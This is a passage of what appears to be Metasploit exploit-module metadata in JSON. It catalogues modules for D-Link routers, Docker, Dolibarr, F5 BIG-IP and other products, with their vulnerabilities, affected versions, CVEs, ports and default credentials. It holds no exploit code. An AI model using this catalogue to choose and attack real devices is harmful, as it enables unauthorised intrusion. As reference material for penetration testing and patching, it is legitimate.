"description": "Some D-Link Routers are vulnerable to OS Command injection in the web interface.\n On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On\n version 1.03 authentication is needed in order to trigger the vulnerability, which\n has been fixed definitely on version 1.04. Other D-Link products, like DIR-300 rev B\n and DIR-600, are also affected by this vulnerability. Not every device includes\n wget which we need for deploying our payload. On such devices you could use the cmd\n generic payload and try to start telnetd or execute other commands. Since it is a\n blind OS command injection vulnerability, there is no output for the executed\n command when using the cmd generic payload. A ping command against a controlled\n system could be used for testing purposes. This module has been tested successfully\n on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the\n vulnerability.",
"references": [
"CVE-2014-100005",
"OSVDB-92144",
"BID-58938",
"EDB-24926",
"URL-http://www.s3cur1ty.de/m1adv2013-017"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_diagnostic_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dir300_exec_telnet": {
"name": "D-Link Devices Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/dlink_dir300_exec_telnet",
"rank": 600,
"disclosure_date": "2013-04-22",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Various D-Link Routers are vulnerable to OS command injection via the web\n interface. The vulnerability exists in tools_vct.xgi, which is accessible with\n credentials. According to the vulnerability discoverer, more D-Link devices may\n be affected.",
"references": [
"OSVDB-92698",
"EDB-25024",
"BID-59405",
"URL-http://www.s3cur1ty.de/m1adv2013-014"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir300_exec_telnet",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dlink_dir605l_captcha_bof": {
"name": "D-Link DIR-605L Captcha Handling Buffer Overflow",
"full_name": "exploit/linux/http/dlink_dir605l_captcha_bof",
"rank": 0,
"disclosure_date": "2012-10-08",
"type": "exploit",
"author": [
"Craig Heffner",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an anonymous remote code execution vulnerability on D-Link DIR-605L routers. The\n vulnerability exists while handling user supplied captcha information, and is due to the\n insecure usage of sprintf on the getAuthCode() function. This module has been tested\n successfully on D-Link DIR-605L firmware 1.13 (emulated) and firmware 1.12 (real).",
"references": [
"OSVDB-86824",
"URL-http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"D-Link DIR-605L 1.13"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir605l_captcha_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dir615_up_exec": {
"name": "D-Link DIR615h OS Command Injection",
"full_name": "exploit/linux/http/dlink_dir615_up_exec",
"rank": 600,
"disclosure_date": "2013-02-07",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some D-Link Routers are vulnerable to an authenticated OS command injection on\n their web interface, where default credentials are admin/admin or admin/password.\n Since it is a blind os command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. This module was tested against\n a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a\n controlled system could be used for testing purposes. The exploit uses the wget\n client from the device to convert the command injection into an arbitrary payload\n execution.",
"references": [
"BID-57882",
"EDB-24477",
"OSVDB-90174",
"URL-http://www.s3cur1ty.de/m1adv2013-008"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dir615_up_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir615_up_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dlink_dir850l_unauth_exec": {
"name": "DIR-850L (Un)authenticated OS Command Exec",
"full_name": "exploit/linux/http/dlink_dir850l_unauth_exec",
"rank": 600,
"disclosure_date": "2017-08-09",
"type": "exploit",
"author": [
"Mumbai",
"Zdenda"
],
"description": "This module leverages an unauthenticated credential disclosure\n vulnerability to then execute arbitrary commands on DIR-850L routers\n as an authenticated user. Unable to use Meterpreter payloads.",
"references": [
"URL-https://www.seebug.org/vuldb/ssvid-96333",
"URL-https://blogs.securiteam.com/index.php/archives/3310"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-10 18:15:22 +0000",
"path": "/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir850l_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dsl2750b_exec_noauth": {
"name": "D-Link DSL-2750B OS Command Injection",
"full_name": "exploit/linux/http/dlink_dsl2750b_exec_noauth",
"rank": 500,
"disclosure_date": "2016-02-05",
"type": "exploit",
"author": [
"p <p@ql>",
"Marcin Bury <marcin@threat9.com>"
],
"description": "This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.\n Vulnerability can be exploited through \"cli\" parameter that is directly used to invoke\n \"ayecli\" binary. Vulnerable firmwares are from 1.01 up to 1.03.",
"references": [
"PACKETSTORM-135706",
"URL-https://seclists.org/fulldisclosure/2016/Feb/53",
"URL-http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsbe Payload",
"Linux mipsel Payload"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dsl2750b_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dspw110_cookie_noauth_exec": {
"name": "D-Link Cookie Command Execution",
"full_name": "exploit/linux/http/dlink_dspw110_cookie_noauth_exec",
"rank": 300,
"disclosure_date": "2015-06-12",
"type": "exploit",
"author": [
"Peter Adkins <peter.adkins@kernelpicnic.net>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an anonymous remote upload and code execution vulnerability on different\n D-Link devices. The vulnerability is a command injection in the cookie handling process of the\n lighttpd web server when handling specially crafted cookie values. This module has been\n successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.",
"references": [
"URL-https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dspw110_cookie_noauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dspw215_info_cgi_bof": {
"name": "D-Link info.cgi POST Request Buffer Overflow",
"full_name": "exploit/linux/http/dlink_dspw215_info_cgi_bof",
"rank": 300,
"disclosure_date": "2014-05-22",
"type": "exploit",
"author": [
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an anonymous remote code execution vulnerability on different D-Link\n devices. The vulnerability is a stack based buffer overflow in the my_cgi.cgi component,\n when handling specially crafted POST HTTP requests addresses to the /common/info.cgi\n handler. This module has been successfully tested on D-Link DSP-W215 in an emulated\n environment.",
"references": [
"OSVDB-108249",
"URL-http://www.devttys0.com/2014/05/hacking-the-dspw215-again/"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"D-Link DSP-W215 - v1.02"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dspw215_info_cgi_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_hedwig_cgi_bof": {
"name": "D-Link hedwig.cgi Buffer Overflow in Cookie Header",
"full_name": "exploit/linux/http/dlink_hedwig_cgi_bof",
"rank": 300,
"disclosure_date": "2013-02-08",
"type": "exploit",
"author": [
"Roberto Paleari",
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an anonymous remote code execution vulnerability on several D-Link\n routers. The vulnerability exists in the handling of HTTP queries to the hedwig.cgi with\n long value cookies. This module has been tested successfully on D-Link DIR300v2.14, DIR600\n and the DIR645A1_FW103B11 firmware.",
"references": [
"OSVDB-95950",
"EDB-27283",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
"URL-http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
"URL-http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hedwig_cgi_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_hnap_bof": {
"name": "D-Link HNAP Request Remote Buffer Overflow",
"full_name": "exploit/linux/http/dlink_hnap_bof",
"rank": 300,
"disclosure_date": "2014-05-15",
"type": "exploit",
"author": [
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an anonymous remote code execution vulnerability on different\n D-Link devices. The vulnerability is due to a stack based buffer overflow while\n handling malicious HTTP POST requests addressed to the HNAP handler. This module\n has been successfully tested on D-Link DIR-505 in an emulated environment.",
"references": [
"CVE-2014-3936",
"BID-67651",
"URL-http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"D-Link DSP-W215 - v1.0",
"D-Link DIR-505 - v1.06",
"D-Link DIR-505 - v1.07"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/dlink_hnap_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hnap_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_hnap_header_exec_noauth": {
"name": "D-Link Devices HNAP SOAPAction-Header Command Execution",
"full_name": "exploit/linux/http/dlink_hnap_header_exec_noauth",
"rank": 300,
"disclosure_date": "2015-02-13",
"type": "exploit",
"author": [
"Samuel Huntley",
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP\n interface. Since it is a blind OS command injection vulnerability, there is no\n output for the executed command. This module has been tested on a DIR-645 device.\n The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,\n DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,\n DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR",
"references": [
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051",
"URL-http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hnap_header_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_hnap_login_bof": {
"name": "Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow",
"full_name": "exploit/linux/http/dlink_hnap_login_bof",
"rank": 600,
"disclosure_date": "2016-11-07",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which\n is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol,\n which accepts arbitrarily long strings into certain XML parameters and then copies them into\n the stack.\n This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested\n using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and\n this vulnerability is present in both MIPS and ARM devices.\n The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a\n few load and store instructions. Because of this the payloads have to be sent unencoded, which\n can cause them to fail, although the bind shell seems to work well.\n For the ARM devices, the inline reverse tcp seems to work best.\n Check the reference links to see the vulnerable firmware versions.",
"references": [
"CVE-2016-6563",
"US-CERT-VU-677427",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt",
"URL-https://seclists.org/fulldisclosure/2016/Nov/38"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dlink DIR-818 / 822 / 823 / 850 [MIPS]",
"Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/dlink_hnap_login_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hnap_login_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_upnp_exec_noauth": {
"name": "D-Link Devices UPnP SOAP Command Execution",
"full_name": "exploit/linux/http/dlink_upnp_exec_noauth",
"rank": 300,
"disclosure_date": "2013-07-05",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\n interface. Since it is a blind OS command injection vulnerability, there is no\n output for the executed command. This module has been tested on DIR-865 and DIR-645 devices.",
"references": [
"CVE-2014-8361",
"OSVDB-94924",
"BID-61005",
"EDB-26664",
"URL-http://www.s3cur1ty.de/m1adv2013-020"
],
"platform": "",
"arch": "",
"rport": 49152,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_upnp_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dnalims_admin_exec": {
"name": "dnaLIMS Admin Module Command Execution",
"full_name": "exploit/linux/http/dnalims_admin_exec",
"rank": 600,
"disclosure_date": "2017-03-08",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"flakey_biscuit <nicholas@shorebreaksecurity.com>"
],
"description": "This module utilizes an administrative module which allows for\n command execution. This page is completely unprotected from any\n authentication when given a POST request.",
"references": [
"CVE-2017-6526",
"US-CERT-VU-929263",
"URL-https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dnalims_admin_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dnalims_admin_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/docker_daemon_tcp": {
"name": "Docker Daemon - Unprotected TCP Socket Exploit",
"full_name": "exploit/linux/http/docker_daemon_tcp",
"rank": 600,
"disclosure_date": "2017-07-25",
"type": "exploit",
"author": [
"Martin Pizala"
],
"description": "Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp\n with tls but without tls-auth), an attacker can create a Docker\n container with the '/' path mounted with read/write permissions on the\n host server that is running the Docker container. As the Docker\n container executes command as uid 0 it is honored by the host operating\n system allowing the attacker to edit/create files owned by root. This\n exploit abuses this to creates a cron job in the '/etc/cron.d/' path of\n the host server.\n\n The Docker image should exist on the target system or be a valid image\n from hub.docker.com.",
"references": [
"URL-https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface",
"URL-https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket"
],
"platform": "",
"arch": "",
"rport": 2375,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux x64",
"Python"
],
"mod_time": "2017-11-15 15:14:58 +0000",
"path": "/modules/exploits/linux/http/docker_daemon_tcp.rb",
"is_install_path": true,
"ref_name": "linux/http/docker_daemon_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dolibarr_cmd_exec": {
"name": "Dolibarr ERP/CRM Post-Auth OS Command Injection",
"full_name": "exploit/linux/http/dolibarr_cmd_exec",
"rank": 600,
"disclosure_date": "2012-04-06",
"type": "exploit",
"author": [
"Nahuel Grisolia <nahuel@cintainfinita.com.ar>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Dolibarr ERP/CRM 3's\n backup feature. This software is used to manage a company's business\n information such as contacts, invoices, orders, stocks, agenda, etc.\n When processing a database backup request, the export.php function\n does not check the input given to the sql_compat parameter, which allows\n a remote authenticated attacker to inject system commands into it,\n and then gain arbitrary code execution.",
"references": [
"OSVDB-80980",
"URL-https://seclists.org/fulldisclosure/2012/Apr/78"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dolibarr 3.1.1 on Linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/dolibarr_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dolibarr_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dreambox_openpli_shell": {
"name": "OpenPLI Webif Arbitrary Command Execution",
"full_name": "exploit/linux/http/dreambox_openpli_shell",
"rank": 500,
"disclosure_date": "2013-02-08",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command\n injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means\n that you will not see any output of your command. A ping command can be used for\n testing the vulnerability. This module has been tested in a box with the next\n features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1\n Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware\n 1.06 and Web Interface 6.0.4-Expert (PLi edition).",
"references": [
"OSVDB-90230",
"BID-57943",
"EDB-24498",
"URL-http://openpli.org/wiki/Webif",
"URL-http://www.s3cur1ty.de/m1adv2013-007"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dreambox_openpli_shell.rb",
"is_install_path": true,
"ref_name": "linux/http/dreambox_openpli_shell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/efw_chpasswd_exec": {
"name": "Endian Firewall Proxy Password Change Command Injection",
"full_name": "exploit/linux/http/efw_chpasswd_exec",
"rank": 600,
"disclosure_date": "2015-06-28",
"type": "exploit",
"author": [
"Ben Lincoln"
],
"description": "This module exploits an OS command injection vulnerability in a\n web-accessible CGI script used to change passwords for locally-defined\n proxy user accounts. Valid credentials for such an account are\n required.\n\n Command execution will be in the context of the \"nobody\" account, but\n this account had broad sudo permissions, including to run the script\n /usr/local/bin/chrootpasswd (which changes the password for the Linux\n root account on the system to the value specified by console input\n once it is executed).\n\n The password for the proxy user account specified will *not* be\n changed by the use of this module, as long as the target system is\n vulnerable to the exploit.\n\n Very early versions of Endian Firewall (e.g. 1.1 RC5) require\n HTTP basic auth credentials as well to exploit this vulnerability.\n Use the USERNAME and PASSWORD advanced options to specify these values\n if required.\n\n Versions >= 3.0.0 still contain the vulnerable code, but it appears to\n never be executed due to a bug in the vulnerable CGI script which also\n prevents normal use (http://jira.endian.com/browse/UTM-1002).\n\n Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug\n (http://bugs.endian.com/print_bug_page.php?bug_id=3083).\n\n Tested successfully against the following versions of EFW Community:\n\n 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.\n\n Should function against any version from 1.1 RC5 to 2.2.x, as well as\n 2.4.1 and 2.5.x.",
"references": [
"CVE-2015-5082",
"URL-http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082",
"EDB-37426",
"EDB-37428"
],
"platform": "Linux",
"arch": "",
"rport": 10443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/efw_chpasswd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/efw_chpasswd_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/empire_skywalker": {
"name": "PowerShellEmpire Arbitrary File Upload (Skywalker)",
"full_name": "exploit/linux/http/empire_skywalker",
"rank": 600,
"disclosure_date": "2016-10-15",
"type": "exploit",
"author": [
"Spencer McIntyre",
"Erik Daguerre"
],
"description": "A vulnerability existed in the PowerShellEmpire server prior to commit\n f030cf62 which would allow an arbitrary file to be written to an\n attacker controlled location with the permissions of the Empire server.\n\n This exploit will write the payload to /tmp/ directory followed by a\n cron.d file to execute the payload.",
"references": [
"URL-http://www.harmj0y.net/blog/empire/empire-fails/"
],
"platform": "Linux,Python",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Python",
"Linux x86",
"Linux x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/linux/http/empire_skywalker.rb",
"is_install_path": true,
"ref_name": "linux/http/empire_skywalker",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_linux/http/esva_exec": {
"name": "E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",
"full_name": "exploit/linux/http/esva_exec",
"rank": 600,
"disclosure_date": "2012-08-16",
"type": "exploit",
"author": [
"iJoo",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in E-Mail Security\n Virtual Appliance. This module abuses the learn-msg.cgi file to execute arbitrary\n OS commands without authentication. This module has been successfully tested on the\n ESVA_2057 appliance.",
"references": [
"OSVDB-85462",
"BID-55050",
"EDB-20551"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ESVA_2057"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/esva_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/esva_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/f5_icall_cmd": {
"name": "F5 iControl iCall::Script Root Command Execution",
"full_name": "exploit/linux/http/f5_icall_cmd",
"rank": 600,
"disclosure_date": "2015-09-03",
"type": "exploit",
"author": [
"tom",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module exploits an authenticated privilege escalation\n vulnerability in the iControl API on the F5 BIG-IP LTM (and likely\n other F5 devices). This requires valid credentials and the Resource\n Administrator role. The exploit should work on BIG-IP 11.3.0\n - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references\n for more details)",
"references": [
"CVE-2015-3628",
"URL-https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html",
"URL-https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"F5 BIG-IP LTM 11.x"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/f5_icall_cmd.rb",
"is_install_path": true,
"ref_name": "linux/http/f5_icall_cmd",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/f5_icontrol_exec": {
"name": "F5 iControl Remote Root Command Execution",
"full_name": "exploit/linux/http/f5_icontrol_exec",
"rank": 600,
"disclosure_date": "2013-09-17",
"type": "exploit",
"author": [
"bperry"
],
"description": "This module exploits an authenticated remote command execution\n vulnerability in the F5 BIGIP iControl API (and likely other\n F5 devices).",
"references": [
"CVE-2014-2928",
"URL-http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"F5 iControl"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/f5_icontrol_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/f5_icontrol_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/foreman_openstack_satellite_code_exec": {
"name": "Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",
"full_name": "exploit/linux/http/foreman_openstack_satellite_code_exec",
"rank": 600,
"disclosure_date": "2013-06-06",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a code injection vulnerability in the 'create'\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier).",
"references": [
"CVE-2013-2121",
"CWE-95",
"OSVDB-94671",
"BID-60833",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=968166",
"URL-http://projects.theforeman.org/issues/2631"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/foreman_openstack_satellite_code_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/fritzbox_echo_exec": {
